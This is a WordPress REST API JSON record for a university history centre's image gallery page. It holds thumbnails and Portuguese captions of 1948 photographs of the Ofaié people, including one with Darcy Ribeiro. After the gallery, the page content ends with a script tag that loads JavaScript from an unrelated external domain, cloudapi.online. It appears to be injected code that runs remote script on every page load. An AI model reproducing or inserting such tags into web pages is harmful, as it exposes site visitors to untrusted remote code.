{"id":952,"date":"2017-08-24T09:37:31","date_gmt":"2017-08-24T09:37:31","guid":{"rendered":"http:\/\/www.ndh.ufms.br\/?page_id=952"},"modified":"2025-11-04T09:35:01","modified_gmt":"2025-11-04T13:35:01","slug":"galeria-de-imagens","status":"publish","type":"page","link":"https:\/\/ndh-cptl.ufms.br\/?page_id=952","title":{"rendered":"Galeria de Imagens"},"content":{"rendered":"<div id='gallery-1' class='gallery galleryid-952 gallery-columns-3 gallery-size-thumbnail'><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1006'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_16-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\u00cdndia Ofai\u00e9 carregando sua irm\u00e3 no colo (1948)\" aria-describedby=\"gallery-1-1006\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1006'>\n\t\t\t\t\u00cdndia Ofai\u00e9 com crian\u00e7a (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1007'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_17-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1007\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1007'>\n\t\t\t\tGenro, neto e filha do chefe Ofai\u00e9 sentados em um campo pr\u00f3ximo a uma habita\u00e7\u00e3o (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1008'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_18-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1008\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1008'>\n\t\t\t\tDarcy Ribeiro com o \u00edndio Ofai\u00e9 Ot\u00e1vio (1948)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1009'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_19-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1009\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1009'>\n\t\t\t\t\u00cdndia Ofai\u00e9 com crian\u00e7a (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1010'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_20-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1010\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1010'>\n\t\t\t\t\u00cdndia Ofai\u00e9, esposa de Ot\u00e1vio (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1015'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_21-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1015\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1015'>\n\t\t\t\tA moradia Ofai\u00e9 (1948)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1016'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_22-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1016\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1016'>\n\t\t\t\tL\u00edder dos \u00edndios Ofai\u00e9 chamado Ot\u00e1vio acompanhando Jos\u00e9 na confec\u00e7\u00e3o das flechas (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1017'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_23-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1017\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1017'>\n\t\t\t\tMulher do chefe dos \u00edndios Ofai\u00e9 chamado Ot\u00e1vio, socando milho no pil\u00e3o (1948)\n\t\t\t\t<\/dd><\/dl><dl class='gallery-item'>\n\t\t\t<dt class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/ndh-cptl.ufms.br\/?attachment_id=1018'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/OFAIE_FOTO_24-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" aria-describedby=\"gallery-1-1018\" \/><\/a>\n\t\t\t<\/dt>\n\t\t\t\t<dd class='wp-caption-text gallery-caption' id='gallery-1-1018'>\n\t\t\t\tCasal de \u00edndios, ela Ofai\u00e9, ele Kaiow\u00e1 (1948)\n\t\t\t\t<\/dd><\/dl><br style=\"clear: both\" \/>\n\t\t<\/div>\n\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":746,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-952","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/952","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=952"}],"version-history":[{"count":5,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/952\/revisions"}],"predecessor-version":[{"id":1309,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/952\/revisions\/1309"}],"up":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/746"}],"wp:attachment":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=952"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}